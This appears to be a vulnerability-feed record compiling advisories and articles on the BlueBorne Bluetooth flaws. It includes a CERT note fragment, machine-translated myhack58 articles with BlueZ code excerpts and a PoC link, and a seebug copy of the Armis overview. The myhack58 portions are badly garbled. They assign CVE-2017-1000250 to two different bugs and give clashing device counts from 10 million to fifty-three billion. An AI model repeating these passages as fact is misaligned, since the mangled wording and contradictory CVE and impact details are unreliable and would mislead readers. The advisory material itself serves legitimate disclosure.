CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://www.armis.com/blueborne/#/technical>\n * <https://source.android.com/security/bulletin/2017-09-01>\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8628>\n * <http://cwe.mitre.org/data/definitions/120.html>\n * <http://cwe.mitre.org/data/definitions/122.html>\n * <http://cwe.mitre.org/data/definitions/125.html>\n * <http://cwe.mitre.org/data/definitions/191.html>\n * <http://cwe.mitre.org/data/definitions/300.html>\n\n### Acknowledgements\n\nThese vulnerabilities were publicly disclosed by Ben Seri and Gregory Vishnepolsky of Armis. Armis acknowledges Alon Livne for the Linux RCE (CVE-2017-1000251) exploit. \n\nThis document was written by Garret Wassermann. \n\n### Other Information\n\n**CVE IDs:** | [CVE-2017-0781, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0781>) [CVE-2017-0782, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0782>) [CVE-2017-0783, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0783>) [CVE-2017-0785, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0785>) [CVE-2017-8628, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8628>) [CVE-2017-14315, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14315>) [CVE-2017-1000250, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000250>) [CVE-2017-1000251](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000251>) \n---|--- \n**Date Public:** | 2017-09-12 \n**Date First Published:** | 2017-09-12 \n**Date Last Updated: ** | 2017-11-08 20:46 UTC \n**Document Revision: ** | 55 \n", "modified": "2017-11-08T20:46:00", "published": "2017-09-12T00:00:00", "id": "VU:240311", "href": "https://www.kb.cert.org/vuls/id/240311", "type": "cert", "title": "Multiple Bluetooth implementation vulnerabilities affect many devices", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2017-09-13T19:14:23", "bulletinFamily": "info", "description": "If you use a Bluetooth-enabled device, whether smartphone, laptop, or Smart TV, Smart Car, or other IoT devices, have to be careful. Recent researchers found the Bluetooth Protocol, 8 0-day vulnerabilities, of which 3 are classified as severity level. These vulnerabilities may affect the 53 million smart devices, Android, iOS, Windows, Linux, system devices, and IoT devices, etc. as long as the use of Bluetooth technology, it is possible to caught. \n! [](/Article/UploadPic/2017-9/2017913204432802. png? www. myhack58. com) \nArmis companies, a researcher will use this 8 a vulnerability named BlueBorne it. Hackers can exploit these vulnerabilities to initiate a remote attack that does not require any user interaction will be able to take over the equipment, spread malicious programs or even man in the middle attacks, the access network device and obtain the device key data. \nAs long as your device open Bluetooth, and in the hack device of Bluetooth connection range, the hacker will be able to attack, even without a successful connection. \nHaving a worm propagation characteristics, can have a serious impact \nThe researchers found that BlueBorne has worm propagation characteristics, can be like WannaCry as the worldwide spread rapidly, disrupting the company, the organization's network. Armis lab, a research group leader Ben Seri represents, in the study of these vulnerabilities when they find out you can use BlueBorne create a botnet, and install ransomware. But he also believes that highly skilled attackers are very difficult to exploit these vulnerabilities to initiate a global worm attack, because at the same time to find all Bluetooth-enabled devices, at the same time for all the platform to initiate attacks, and the use of an infected device to automatically a wide range of spread, these three points are very difficult to achieve. \nHowever, BlueBorne can be used for network monitoring, data theft, extortion, and even the use of IoT devices create is similar to Mirai a large botnet, or use your mobile device to create similar to the WireX botnet and other malicious activity, the harm can not be ignored. \nFirst, spread through the air, making the attacks more infectious and spread effortlessly.; and \nSecond, BlueBorne attacks can bypass current security measures, and not to be found, because the traditional method does not guard against airborne threats. Airborne assault may also allow a hacker to\u201csecurity\u201dof an isolated network not connected to the Internet, nor connect to the Internet in any other device, which may endanger the industrial system, government agencies and critical infrastructure; \nFinally, with the traditional malicious software or attacks, this attack requires no user interaction, the user need not click on links or download suspicious files, don't need to take any action to start the attack. \n! [](/Article/UploadPic/2017-9/2017913204433877. png? www. myhack58. com) \nThe researchers said the vulnerability is by far the most serious Bluetooth vulnerability. Prior to the identification to the Bluetooth vulnerability exists only on the Protocol level, but BlueBorne was present in the implementation level, the ability to bypass a variety of authentication mechanisms, to achieve the the target device to completely take over. \nArmis reminder: be wary of the BlueBorne with physical devices combined attack. For example, a go to the Bank Parcel Delivery courier may carry a maliciously encoded Bluetooth device. Once he entered the Bank, and this device will just infect other people's devices, and let the attacker in the original security of the network to find the stronghold. \nAffect the wide range, as soon as patched \nAccording to researcher disclosure, these 8 vulnerabilities are: \nAndroid Bluetooth network encapsulation Protocol remote code execution vulnerability, CVE-2017-0781\uff09 \nAndroid Bluetooth network encapsulation Protocol Personal Area\uff08PAN\uff09in the Protocol file remote code execution vulnerability, CVE-2017-0782) \nAndroid Bluetooth Pineapple logical Vulnerability(CVE-2017-0783) \nAndroid information disclosure Vulnerability(CVE-2017-0785) \nLinux kernel remote code execution vulnerability, CVE-2017-1000250) \nThe Linux Bluetooth stack(BlueZ) information disclosure Vulnerability(CVE-2017-1000250) \nWindows Bluetooth Pineapple logical Vulnerability(CVE-2017-8628) \nApple low-power audio Protocol remote code execution vulnerability(CVE Pending) \nA vulnerability is discovered, the researchers first time to report to all potentially affected major corporations, including Google, Apple, Microsoft, Samsung and the Linux Foundation. Wherein the affected area is as follows: \nAndroid: Android all version mobile phones, tablets and wearable devices are subject to the above four Android Bluetooth vulnerability. And using only the Bluetooth low power consumption of Android devices are not affected. Google in 9 months of security fixes have been issued related to the patch. \nWindows: from Vista, after all Windows versions are affected. Microsoft says Windows Phone will not be affected by BlueBorne impact. In fact, Microsoft has in the 7 months it quietly posted insurance payments have been Windows Bluetooth Pineapple logical Vulnerability(CVE-2017-8628)of the patch, but in the 9 May 12, the repair may only disclose the details. \nLinux: all run BlueZ Linux equipment are subject to information disclosure Vulnerability, CVE-2017-1000250 impact; since 2011, the 10 on the release of 3.3-rc1 after the version of Linux are affected by a remote code execution vulnerability, CVE-2017-1000250 impact; Samsung Linux-based Tizen system is also affected; \niOS: all iOS 9.3.5 and previous versions of the iPhone, iPad and iPod devices, the Apple TV 7.2.2 and prior versions are affected. iOS 10 has been to fix these vulnerabilities. \nAccording to the Armis estimates, about 20 billion for all affected equipment 40% equipment is unable to repair the vulnerability, because these devices version is too old, already no longer supported. \nCurrently, Google and Microsoft have released a repair patch, the user can download the update. While Apple's latest version of mobile system iOS 10. X is very secure. \nA Microsoft spokesperson said: \nMicrosoft in July released a security patch that enabled the Windows Update and apply the security update the users will be automatically protected. Our first update is in order to protect the safety of users; but, as a responsible industry partner, we temporarily not to disclose information until the other suppliers also developed and successfully released to update the program so far. \nAndroid users from the Google Play Store to install the Armis team development \u201cBlueBorne Vulnerability Scanner\u201d app for checking your device is vulnerable to BlueBorne attack. If you find the presence of the vulnerability, recommended that when not in use\u201cturn off\u201dthe Bluetooth function. \nThe following attached Armis of the vulnerability analysis report and a different system of attack demo video, take. to: \nReport original: http://go.armis.com/hubfs/BlueBorne%20Technical%20White%20Paper.pdf \n\n", "modified": "2017-09-13T00:00:00", "published": "2017-09-13T00:00:00", "id": "MYHACK58:62201789258", "href": "http://www.myhack58.com/Article/html/3/62/2017/89258.htm", "title": "Bluetooth agreement revealed eight major security vulnerability bug, capable of affecting fifty-three billion Bluetooth the efficacy of the equipment-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-09-29T14:08:54", "bulletinFamily": "info", "description": "The other day, and armis burst a series of Bluetooth flaws, no war no perception of the receiving system can be a bit can be hacked, and essentially impact all of the Bluetooth equipment, the persecution of the immeasurable, can be seen here https://www.armis.com/blueborne/ to understand how it guards to be: just the phone turn on the Bluetooth, it can be a long moderation. Nowadays mobile phones are so many, the application of this flaws written worm of the object, then can be again is a mobile version of low with wannacry. We 360Vulpecker Team in the know to these coherent information, Blaster stops the follow-up elucidating it. armis gives them the whitepaper, on the Bluetooth architecture, and the few flaws of elucidating possible to say that the exception is too small, the first film hair. No they did not give out these flaws of the PoC or is the exp, just to give a for Android\u201cBlueBorne detection app\", what, then the inverse of this invention is only to detect a system patch date. So I picked up a wave \u7259\u6167, these few flaws then elucidating a bit, then taking poc to write out: \n* CVE-2017-1000250 Linux bluetoothd process information leakage \n* CVE-2017-1000251 Linux kernel-stack overflow \n* CVE-2017-0785 Android com. android. bluetooth the process of information leakage \n* CVE-2017-0781 Android com. android. bluetooth process stack overflow \n* CVE-2017-0782 Android com. android. bluetooth process stack overflow \nThe above PoC code is in \nhttps://github.com/marsyy/littl_tools/tree/master/bluetooth \nBecause it is because of these few flaws only from the zero beginning to engage the Bluetooth, so it should be some elucidating not in place for the premises, also Please the way the big cattle shows. \n0x01 Bluetooth architecture and code spread \nHere the first should be dishing out armis of the paper in the figure: \n! [](/Article/UploadPic/2017-9/201792913526931. png? www. myhack58. com) \nFigure on the Bluetooth of each structured stakeholder DESCRIPTION is very detailed, not we're here temporarily just need to care so a few layers: HCI, L2CAP, AND BNEP, with the SDP. BNEP and SDP is more than the lower offices, the HCI at the bottom, indirect and Bluetooth equipment. And bearing in Bluetooth-do and the underlying equipment between the bridges, also is the L2CAP layer. Each layer has its agreements, the provisions of the data organization of the layout, all the layers of the data packet combined together, is a complete Bluetooth package a SDP packet as an example: the \n! [](/Article/UploadPic/2017-9/201792913526181. png? www. myhack58. com) \nWhile the provisions of the agreement of the architecture is the figure stated, but the specific implementation is divisive, Linux with the BlueZ, and now of Android with BlueDroid, but also for both architectures say The code of the specific spread. \nBlueZ \nIn Linux, using the BlueZ architecture, by the bluetoothd to supply BNEP,SDP these compare to the lower offices, and the L2CAP layer is on the inner core outside. To deal with BlueZ We of the SDP and L2CAP uncomparable to elucidating the. \n1, to achieve the SDP-do the code in the code directory/src/sdp, this sdp-client. c is it the client, the sdp-server. c is it do end. We're elucidating the flaws are long flaws, to is results are out in-do-end outside, let's focus on the Deposit dependents-do end. And do end the focus of the code, it should be Is it butt by the packet disposal process, this process by the sdp-request. c to achieve. When the L2CAP layer SDP data, will trigger the sdp-server. c io_session_event function to obtain the data packet, by the sdp-request. c The handle_request function dispose(how to dispose of, the subsequent flaws in elucidating the time and then tell): a \nstatic gboolean io_session_event(GIOChannel *chan, GIOCondition cond, gpointer data) \n{ \n... \nlen = recv(sk, &hdr, sizeof(sdp_pdu_hdr_t), MSG_PEEK); //get the SDP header data, to obtain the SDP data giant \nif (len int) len sizeof(sdp_pdu_hdr_t)) { \nsdp_svcdb_collect_all(sk); \nreturn FALSE; \n} \n\nsize = sizeof(sdp_pdu_hdr_t) + ntohs(hdr. plen); \nbuf = malloc(size); \nif (! buf) \nreturn TRUE; \n\nlen = recv(sk, buf, size, 0); //get the complete data packet \n... \nhandle_request(sk, buf, len); \n\nreturn TRUE; \n} \n2, The L2CAP layer of code in the kernel, here I am to Linux 4.2.8 of this code, for example. the l2cap layer is important from /net/bluetooth/l2capcore. c and/net/bluetooth/l2cap_sock. c to achieve. l2cap_core. c implements the L2CAP agreement of important content, l2cap_sock. c via the process of registering sock agreements supplied to this layer for the userspace interface. Strange we care a L2CAP butt by the data packet after the disposal process, the L2CAP data by the HCI layer transmission snapped past, in hci_core. c hci_rx_work function \nstatic void hci_rx_work(struct work_struct *work) \n{ \n\nwhile ((skb = skb_dequeue(&hdev->rx_q))) { \n/* Send copy to monitor */ \nhci_send_to_monitor(hdev, skb); \n\n... \nswitch (bt_cb(skb)->pkt_type) { \ncase HCI_EVENT_PKT: \nBT_DBG(\"%s Event packet\", hdev->name); \nhci_event_packet(hdev, skb); \nbreak; \n\ncase HCI_ACLDATA_PKT: \nBT_DBG(\"%s ACL data packet\", hdev->name); \nhci_acldata_packet(hdev, skb); \n\n\n**[1] [[2]](<89526_2.htm>) [[3]](<89526_3.htm>) [[4]](<89526_4.htm>) [[5]](<89526_5.htm>) [[6]](<89526_6.htm>) [[7]](<89526_7.htm>) [[8]](<89526_8.htm>) [[9]](<89526_9.htm>) [[10]](<89526_10.htm>) [next](<89526_2.htm>)**\n", "modified": "2017-09-29T00:00:00", "published": "2017-09-29T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/89526.htm", "id": "MYHACK58:62201789526", "title": "BlueBorne Bluetooth flaws vulnerability bug depth research and PoC-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-14T17:13:25", "bulletinFamily": "info", "description": "! [](/Article/UploadPic/2017-9/2017914203619863. jpg? www. myhack58. com) \nDescription \nArmis Labs show an intrusion attack vector, such that the mounting tributary of the move, the desktop, and IoT operating systems include Android, iOS, Windows, Linux systems and equipment are subject to its influence. \nIt is through the process of atmosphere(airborne)can be spread, and then through a process of the Bluetooth(Bluetooth)agreements proposed invasion attack. BlueBorne hence the name. \nReference: https://www.armis.com/blueborne/ \nBlueBorne the reason why the risk is because most of the users are YAP in their does not application Bluetooth time Bluetooth switch off. And the attacker basically unnecessary with the target equipment pairing(what, then banner of lights in the takeover range)will be a complete take over of the equipment. \nArmis Labs team head of Ben Seri said that they had in the test case to set up a botnet, and the application BlueBorne intrusion attack means hit a single software. \nHowever, the Seri think, that is experienced the invasion of the attacker, you want to in the world wide range of making an alignment of all platforms, and may perhaps from a contaminated equipment slowly contamination around the equipment, and having a self-circulating effect of the worm is also not then easily. \nReference: http://thehackernews.com/2017/09/blueborne-bluetooth-hacking.html \n4 high-risk flaws \nArmis information lists the 8 flaws, and this 4 is a high-risk flaws(while Google's concluded that in all divisions) to: \nReference: http://www.androidpolice.com/2017/09/13/googles-september-security-patch-fixes-blueborne-bluetooth-vulnerability/ \nInformation leak flaws (CVE-2017-0785) \nThe flaws occur on the SDP-do on the controller, the invasion of the attacker via a process to the SDP Office of the controller to recover the structure of the pleading, and then do the miles on the invasion of the attacker corresponding to the leak it is in memory information that can be sponsored invasion of the attacker's identify around the Bluetooth work, and the application of the above-mentioned long-distance code to fulfil flaws. \nLong distance code to fulfil flaws#1 (CVE-2017-0781) \nThe flaws occur in the Bluetooth network encapsulation agreement Bluetooth Network Encapsulation Protocol, BNEP\uff09 - do, the Do for VIA the process of Bluetooth adapter to share Internet tethering on. Because BNEP offices, there is a disadvantage, the invasion of the attacker may be structural abnormalities of the easy application of surgical memory corruption, and then intrusion the attacker can complete take over the equipment and then perform arbitrary rate code. Because of shortage of the appropriate authorized certification, to trigger this flaw basically unnecessary any user interaction, the authentication may pairing, based on the target user complete helplessness perceived is to stop the invasion of the attack. \nLong distance code to fulfil flaws#2 (CVE-2017-0782) \nThe flaws keep up with a similar, but present in the BNEP-do top--PAN\uff08Personal Area Networking\uff09profile, this file is used in two equipment between the set of IP network convergence. In this the flaws of the case, the memory corruption greater, but can still perhaps be the invasion of the attacker the application in order to get the affected equipment complete control. Keep up with a flaws similar to this flaws without user interaction, the authentication or pairing will be triggered. \nThe Bluetooth Pineapple \u2013the middleman invasion attack (CVE-2017-0783) \nIntermediaries intrusion attack so that the attacker can may hinder and nuisance revenue target equipment traffic. In the WiFi case, to propose a MITM, the attacker not only need special equipment, but also necessary to have from the target equipment sent to it used to establish the convergence of the\u201cwither\u201dWiFi network with no encryption the secret key of the adapter is begging for. Invasion attacker must sniff to the\u201cadapter\u201din the\u201cwithers\u201don the network of the target equipment sent to the\u201cwithering\u201dof the network 802. 11 of the probe request packet, then disguised as the\u201cwithering\u201dof the network, to the target to the probe response. While in Bluetooth(Bluetooth), the attacker can probably automatically apply support Bluetooth equipment to tease the target. The flaws in the Bluetooth agreement stack of the PAN profile can be such that the attacker in the victim's equipment on the creation of a vicious thoughts of the network interface, from a new set of equipment furnishings network routing, and then the equipment on all communications traffic are gone this vicious thoughts network interface. Such intrusion unnecessary user interaction, the authentication may pairing, which makes the reality of the invasion to the attack in the invisible. \nReference: https://www.armis.com/blueborne/ \nSpecific articulation may refer to: http://go.armis.com/hubfs/BlueBorne%20Technical%20White%20Paper-1.pdf \nBlueBorne intrusion attacks what are the differences for? \nWith the traditional network intrusion attacks differences, BlueBorne unnecessary user clicks on a URL link, perhaps download vicious thoughts file, the victim And even the basic unnecessary link to the Internet, it can may applications Bluetooth agreement in the short-range connotation of the atmosphere spread, and the hackers basic it is not necessary and the purpose of the victims of the pairing, as long as the purpose of the Bluetooth switch is in the closed condition, a hacker can link to this station equipment, and complete take over of equipment, you can also perhaps via a process to be tapping under the equipment spread vicious thoughts software, and the victims of complete helplessness aware of it! \nBlueBorne intrusion scenario is what? \nImagine a holding a BlueBorne intrusion contaminated with Bluetooth equipment(weekdays case can perhaps be a cell phone)of the couriers, he at the Bank on weekdays is available but is very secure premises-the parcel come up to, then with his Bluetooth equipment to put the package to the recipient, then the couriers take this contaminated equipment can be perhaps the convergence of banks inside the rest shut the Bluetooth switch of the affected equipment like smartphones, smart watches, laptops, and then the Bank personnel and Bank customers spread vicious thoughts software. Then he went on to a station and a station send a courier, and he complete don't know he is being spread vicious thoughts software. Then He on the way in Britain at the end of his contaminated equipment will lead to vicious thoughts software streaming support, and those equipment may perhaps out of the now large company gathering, cafe, and even may perhaps in the hospital, the ultimate may perhaps incur company, the hospital and other large bodies of information leakage, perhaps playing a single virus. \nReference: https://www.youtube.com/watch?v=LLNtZKpL0P8 \nBlueBorne invasion attack truth \nBluetooth agreement stack, each of the flaws profile \n! [](/Article/UploadPic/2017-9/2017914203619845. png? www. myhack58. com) \nPicture origins: http://go.armis.com/hubfs/BlueBorne%20Technical%20White%20Paper-1.pdf \nThe affected equipment \nAndroid equipment \nAll Android smartphone, tablet, wearable equipment are affected by the after-mentioned 4 a high-risk flaws affect the two is the long distance code to fulfill the flaws(CVE-2017-0781 and CVE-2017-0782), there is a can be applied to stop the MITM intrusion attacks CVE-2017-0783, as well as a will lead to information leakage, CVE-2017-0785-in. \nThe Android platform intrusion demo \nWindows equipment \nWindows Vista has all versions of the system are subject to the\u201cBluetooth Pineapple\u201d invasion attack CVE-2017-8628 impact, you can make the invasion an attacker to stop the MITM intrusion attacks. \n\n\n**[1] [[2]](<89277_2.htm>) [next](<89277_2.htm>)**\n", "modified": "2017-09-14T00:00:00", "published": "2017-09-14T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/89277.htm", "id": "MYHACK58:62201789277", "title": "Bluetooth agreement flaws vulnerability:BlueBorne attack affected the number of 10 million Bluetooth equipped-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}], "seebug": [{"lastseen": "2017-11-19T13:05:46", "bulletinFamily": "exploit", "description": "### General Overview\r\n\r\nArmis Labs revealed a new attack vector endangering major mobile, desktop, and IoT operating systems, including Android, iOS, Windows, and Linux, and the devices using them. The new vector is dubbed \u201cBlueBorne\u201d, as it spread through the air (airborne) and attacks devices via Bluetooth. Armis has also disclosed eight related zero-day vulnerabilities, four of which are classified as critical. BlueBorne allows attackers to take control of devices, access corporate data and networks, penetrate secure \u201cair-gapped\u201d networks, and spread malware laterally to adjacent devices. Armis reported these vulnerabilities to the responsible actors, and is working with them as patches are being identified and released.\r\n\r\nHere is a quick overview of how BlueBorne works:\r\nhttps://youtu.be/LLNtZKpL0P8\r\n\r\n#### Blueborne Brief Overview\r\n\r\nWhat Is BlueBorne?\r\nBlueBorne is an attack vector by which hackers can leverage Bluetooth connections to penetrate and take complete control over targeted devices. BlueBorne affects ordinary computers, mobile phones, and the expanding realm of IoT devices. The attack does not require the targeted device to be paired to the attacker\u2019s device, or even to be set on discoverable mode. Armis Labs has identified eight zero-day vulnerabilities so far, which indicate the existence and potential of the attack vector. Armis believes many more vulnerabilities await discovery in the various platforms using Bluetooth. These vulnerabilities are fully operational, and can be successfully exploited, as demonstrated in our research. The BlueBorne attack vector can be used to conduct a large range of offenses, including remote code execution as well as Man-in-The-Middle attacks.\r\n\r\nAdditional Information: Download our Technical White Paper on BlueBorne\r\n\r\n### What Is The Risk?\r\n\r\nThe BlueBorne attack vector has several qualities which can have a devastating effect when combined. By spreading through the air, BlueBorne targets the weakest spot in the networks\u2019 defense \u2013 and the only one that no security measure protects. Spreading from device to device through the air also makes BlueBorne highly infectious. Moreover, since the Bluetooth process has high privileges on all operating systems, exploiting it provides virtually full control over the device.\r\n\r\nUnfortunately, this set of capabilities is extremely desireable to a hacker. BlueBorne can serve any malicious objective, such as cyber espionage, data theft, ransomware, and even creating large botnets out of IoT devices like the Mirai Botnet or mobile devices as with the recent WireX Botnet. The BlueBorne attack vector surpasses the capabilities of most attack vectors by penetrating secure \u201cair-gapped\u201d networks which are disconnected from any other network, including the internet.\r\n\r\n### How Wide Is The Threat?\r\n\r\n#### The threat posed by the BlueBorne attack vector\r\nThe BlueBorne attack vector can potentially affect all devices with Bluetooth capabilities, estimated at over 8.2 billion devices today. Bluetooth is the leading and most widespread protocol for short-range communications, and is used by devices of all kinds, from regular computers and mobile devices to IoT devices such as TVs, watches, cars, and even medical appliances. The latest published reports show more than 2 billion Android, 2 billion Windows, and 1 billion Apple devices in use. Gartner reports that there are 8 billions connected or IoT devices in the world today, many of which have Bluetooth.\r\n\r\n### What Is New About BlueBorne?\r\n\r\n#### A new airborne attack vector\r\nBlueBorne concerns us because of the medium by which it operates. Unlike the majority of attacks today, which rely on the internet, a BlueBorne attack spreads through the air. This works similarly to the two less extensive vulnerabilities discovered recently in a Broadcom Wi-Fi chip by Project Zero and Exodus. The vulnerabilities found in Wi-Fi chips affect only the peripherals of the device, and require another step to take control of the device. With BlueBorne, b attackers can gain full control right from the start. Moreover, Bluetooth offers a wider attacker surface than WiFi, almost entirely unexplored by the research community and hence contains far more vulnerabilities.\r\n\r\nAirborne attacks, unfortunately, provide a number of opportunities for the attacker. First, spreading through the air renders the attack much more contagious, and allows it to spread with minimum effort. Second, it allows the attack to bypass current security measures and remain undetected, as traditional methods do not protect from airborne threats. Airborne attacks can also allow hackers to penetrate secure internal networks which are \u201cair gapped,\u201d meaning they are disconnected from any other network for protection. This can endanger industrial systems, government agencies, and critical infrastructure.\r\n\r\nFinally, unlike traditional malware or attacks, the user does not have to click on a link or download a questionable file. No action by the user is necessary to enable the attack\r\n\r\n#### A comprehensive and severe threat\r\nThe BlueBorne attack vector requires no user interaction, is compatible to all software versions, and does not require any preconditions or configurations aside of the Bluetooth being active. Unlike the common misconception, Bluetooth enabled devices are constantly searching for incoming connections from any devices, and not only those they have been paired with. This means a Bluetooth connection can be established without pairing the devices at all. This makes BlueBorne one of the most broad potential attacks found in recent years, and allows an attacker to strike completely undetected.\r\n\r\n#### Next generation Bluetooth vulnerabilities\r\nIn the past, most Bluetooth vulnerabilities and security flaws originated in issues with the protocol itself, which were resolved in version 2.1 in 2007. Nearly all vulnerabilities found since were of low severity, and did not allow remote code execution. This transition occurred as the research community turned its eyes elsewhere, and did not scrutinize the implementations of the Bluetooth protocol in the different platforms, as it did with other major protocols.\r\n\r\nBluetooth is a difficult protocol to implement, which makes it prone to two kinds of vulnerabilities. On the one hand, vendors are likely to follow the protocol\u2019s implementation guidelines word-for-word, which means that when a vulnerability is found in one platform it might affect others. These mirrored vulnerabilities happened with CVE-2017-8628 and CVE-2017-0783 (Windows & Android MiTM) which are \u201cidentical twins\u201d. On the other hand, in some areas the Bluetooth specifications leave too much room for interpretation, causing fragmented methods of implementation in the various platforms, making each of them more likely to contain a vulnerability of its own.\r\n\r\nThis is why the vulnerabilities which comprise BlueBorne are based on the various implementations of the Bluetooth protocol, and are more prevalent and severe than those of recent years. We are concerned that the vulnerabilities we found are only the tip of the iceberg, and that the distinct implementations of the protocol on other platforms may contain additional vulnerabilities.\r\n\r\n#### A Coordinated Disclosure\r\nArmis reached out to the following actors to ensure a safe, secure, and coordinated response to the vulnerabilities identified.\r\n\r\nGoogle \u2013 Contacted on April 19, 2017, after which details were shared. Released public security update and security bulletin on September 4th, 2017. Coordinated disclosure on September 12th, 2017.\r\nMicrosoft \u2013 Contacted on April 19, 2017 after which details were shared. Updates were made on July 11. Public disclosure on September 12, 2017 as part of coordinated disclosure.\r\nApple \u2013 Contacted on August 9, 2017. Apple had no vulnerability in its current versions.\r\nSamsung \u2013 Contact on three separate occasions in April, May, and June. No response was received back from any outreach.\r\nLinux \u2013 Contacted August 15 and 17, 2017. On September 5, 2017, we connected and provided the necessary information to the the Linux kernel security team and to the Linux distributions security contact list and conversations followed from there. Targeting updates for on or about September 12, 2017 for coordinated disclosure.\r\n\r\n### Affected Devices\r\n\r\n#### The threat posed by the vulnerabilities Armis disclosed\r\nThe vulnerabilities disclosed by Armis affect all devices running on Android, Linux, Windows, and pre-version 10 of iOS operating systems, regardless of the Bluetooth version in use. This means almost every computer, mobile device, smart TV or other IoT device running on one of these operating systems is endangered by at least one of the eight vulnerabilities. This covers a significant portion of all connected devices globally.\r\n\r\n#### What Devices Are Affected?\r\n##### Android\r\nAll Android phones, tablets, and wearables (except those using only Bluetooth Low Energy) of all versions are affected by four vulnerabilities found in the Android operating system, two of which allow remote code execution (CVE-2017-0781 and CVE-2017-0782), one results in information leak (CVE-2017-0785) and the last allows an attacker to perform a Man-in-The-Middle attack (CVE-2017-0783).\r\n\r\nExamples of impacted devices:\r\n\r\n* Google Pixel\r\n* Samsung Galaxy\r\n* Samsung Galaxy Tab\r\n* LG Watch Sport\r\n* Pumpkin Car Audio System\r\n\r\nGoogle has issued a patch and notified its partners. It will be available for:\r\n\r\n* Nougat (7.0)\r\n* Marshmallow (6.0)\r\n\r\n\r\nGoogle has issued a security update patch and notified its partners. It was available to Android partners on August 7th, 2017, and made available as part of the September Security Update and Bulletin. We recommend that users check that Bulletin for the latest most accurate information. Android users should verify that they have the September 9, 2017 Security Patch Level,\r\n\r\nNote to Android users: To check if your device is risk or is the devices around you are at risk, download the Armis BlueBorne Scanner App on Google Play.\r\n\r\n##### Windows\r\n\r\nAll Windows computers since Windows Vista are affected by the \u201cBluetooth Pineapple\u201d vulnerability which allows an attacker to perform a Man-in-The-Middle attack (CVE-2017-8628).\r\n\r\nMicrosoft is issuing security patches to all supported Windows versions at 10 AM, Tuesday, September 12. We recommend that Windows users should check with the Microsoft release here for the latest information.\r\n\r\n##### Linux\r\nLinux is the underlying operating system for a wide range of devices. The most commercial, and consumer-oriented platform based on Linux is the Tizen OS.\r\n\r\n* All Linux devices running BlueZ are affected by the information leak vulnerability (CVE-2017-1000250).\r\n* All Linux devices from version 3.3-rc1 (released in October 2011) are affected by the remote code execution vulnerability (CVE-2017-1000251).\r\n\r\nExamples of impacted devices:\r\n\r\n* Samsung Gear S3 (Smartwatch)\r\n* Samsung Smart TVs\r\n* Samsung Family Hub (Smart refrigerator)\r\n\r\nInformation on Linux updates will be provided as soon as they are live.\r\n\r\n##### iOS\r\nAll iPhone, iPad and iPod touch devices with iOS 9.3.5 and lower, and AppleTV devices with version 7.2.2 and lower are affected by the remote code execution vulnerability. This vulnerability was already mitigated by Apple in iOS 10, so no new patch is needed to mitigate it. We recommend you upgrade to the latest iOS or tvOS available.\r\n\r\nIf you are concerned that your device may not be patched, we recommend disabling Bluetooth, and minimizing its use until you can confirm a patch is issued and installed on your device.\r\n\r\n### Technical Overview\r\n\r\n#### BlueBorne Explained: How The Attack Vector Works\r\n\r\nThe BlueBorne attack vector has several stages. First, the attacker locates active Bluetooth connections around him or her. Devices can be identified even if they are not set to \u201cdiscoverable\u201d mode. Next, the attacker obtains the device\u2019s MAC address, which is a unique identifier of that specific device. By probing the device, the attacker can determine which operating system his victim is using, and adjust his exploit accordingly. The attacker will then exploit a vulnerability in the implementation of the Bluetooth protocol in the relevant platform and gain the access he needs to act on his malicious objective. At this stage the attacker can choose to create a Man-in-The-Middle attack and control the device\u2019s communication, or take full control over the device and use it for a wide array of cybercriminal purposes.\r\n\r\n[Download our Technical White Paper on BlueBorne](http://go.armis.com/blueborne-technical-paper)\r\n\r\n#### BlueBorne attack on Android\r\nOnce the attacker determined his target is using the Android operating system, he can use four of the vulnerabilities disclosed by Armis to exploit the device, or they can use a separate vulnerability to conduct a Man-in-The-Middle attack.\r\n\r\nHere is a quick demo of how BlueBorne can take control of an Android device:\r\nhttps://youtu.be/Az-l90RCns8\r\n\r\n##### Information Leak Vulnerability (CVE-2017-0785)\r\nThe first vulnerability in the Android operating system reveals valuable information which helps the attacker leverage one of the remote code execution vulnerabilities described below. The vulnerability was found in the SDP (Service Discovery Protocol) server, which enables the device to identify other Bluetooth services around it. The flaw allows the attacker to send a set of crafted requests to the server, causing it to disclose memory bits in response. These pieces of information can later be used by the attacker to overcome advanced security measures and take control over the device. This vulnerability can also allow an attacker to leak encryption keys from the targeted device and eavesdrop on Bluetooth communications, in an attack that very much resembles heartbleed.\r\n\r\n##### Remote Code Execution Vulnerability #1 (CVE-2017-0781)\r\nThis vulnerability resides in the Bluetooth Network Encapsulation Protocol (BNEP) service, which enables internet sharing over a Bluetooth connection (tethering). Due to a flaw in the BNEP service, a hacker can trigger a surgical memory corruption, which is easy to exploit and enables him to run code on the device, effectively granting him complete control. Due to lack of proper authorization validations, triggering this vulnerability does not require any user interaction, authentication or pairing, so the targeted user is completely unaware of an ongoing attack.\r\n\r\n##### Remote Code Execution vulnerability #2 (CVE-2017-0782)\r\nThis vulnerability is similar to the previous one, but resides in a higher level of the BNEP service \u2013 the Personal Area Networking (PAN) profile \u2013 which is responsible for establishing an IP based network connection between two devices. In this case, the memory corruption is larger, but can still be leveraged by an attacker to gain full control over the infected device. Similar to the previous vulnerability, this vulnerability can also be triggered without any user interaction, authentication or pairing.\r\n\r\n##### The Bluetooth 